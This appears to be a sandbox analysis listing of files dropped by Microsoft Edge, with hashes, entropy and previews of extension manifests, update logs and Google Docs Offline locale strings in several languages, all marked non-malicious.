                                                                                                                                                                                                                                                SSDEEP:24:YK0bl5r75riCe0qW+5Ua02EHP5IKL0jZ5JwbX/B+L0HG5Eqi0HO05M:YK0bl5r75riN0qW+5Ua02sP5IKL0jZ5m
                                                                                                                                                                                                                                                MD5:53B135F9A9F504FA0A9AF5CEF85033E7
                                                                                                                                                                                                                                                SHA1:D005ED4D8528D9D925A8C2AFBC89B6750928847E
                                                                                                                                                                                                                                                SHA-256:5766A364BB443FE08DA514300D9F8E818D1F00EBA64E0339DC5C118EB39B8581
                                                                                                                                                                                                                                                SHA-512:4BDFAD08D5765F5D1DCBFDF308D54E0BC319FCA6BBC8CA777B20A7D7D05B8224130BC2A21FB79DDAA858A01126F2A706CD6B2FA08177DA96CF0CCAA3CE3DF246
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"logTime": "1005/074019", "correlationVector":"Jzai6BfByv5amZ45/NBe5r","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"eO8FwRQNRwFtIUhPNa0yBN","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/074027", "correlationVector":"DFCC0B139A2547CAA3433B33892C7FE6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075031", "correlationVector":"bWXPYvVSVVANvrGBV6dHxn","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075032", "correlationVector":"4CD8E3A1D096444AAB77DA6A690C4356","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075123", "correlationVector":"t3DmiSvoNTibe+/mLDIMfl","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075124", "correlationVector":"B2B504519464422FA5C6E610072CF270","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/075313", "correlationVector":"/q9eTq3f/ZawbQrLDVWKju","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/075314", "correlationVector":"138D0C7D
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):11185
                                                                                                                                                                                                                                                Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1753
                                                                                                                                                                                                                                                Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):9815
                                                                                                                                                                                                                                                Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):10388
                                                                                                                                                                                                                                                Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):962
                                                                                                                                                                                                                                                Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1031
                                                                                                                                                                                                                                                Entropy (8bit):4.621865814402898
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
                                                                                                                                                                                                                                                MD5:D116453277CC860D196887CEC6432FFE
                                                                                                                                                                                                                                                SHA1:0AE00288FDE696795CC62FD36EABC507AB6F4EA4
                                                                                                                                                                                                                                                SHA-256:36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
                                                                                                                                                                                                                                                SHA-512:C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1613
                                                                                                                                                                                                                                                Entropy (8bit):4.618182455684241
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
                                                                                                                                                                                                                                                MD5:9ABA4337C670C6349BA38FDDC27C2106
                                                                                                                                                                                                                                                SHA1:1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
                                                                                                                                                                                                                                                SHA-256:37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
                                                                                                                                                                                                                                                SHA-512:8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):848
                                                                                                                                                                                                                                                Entropy (8bit):4.494568170878587
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
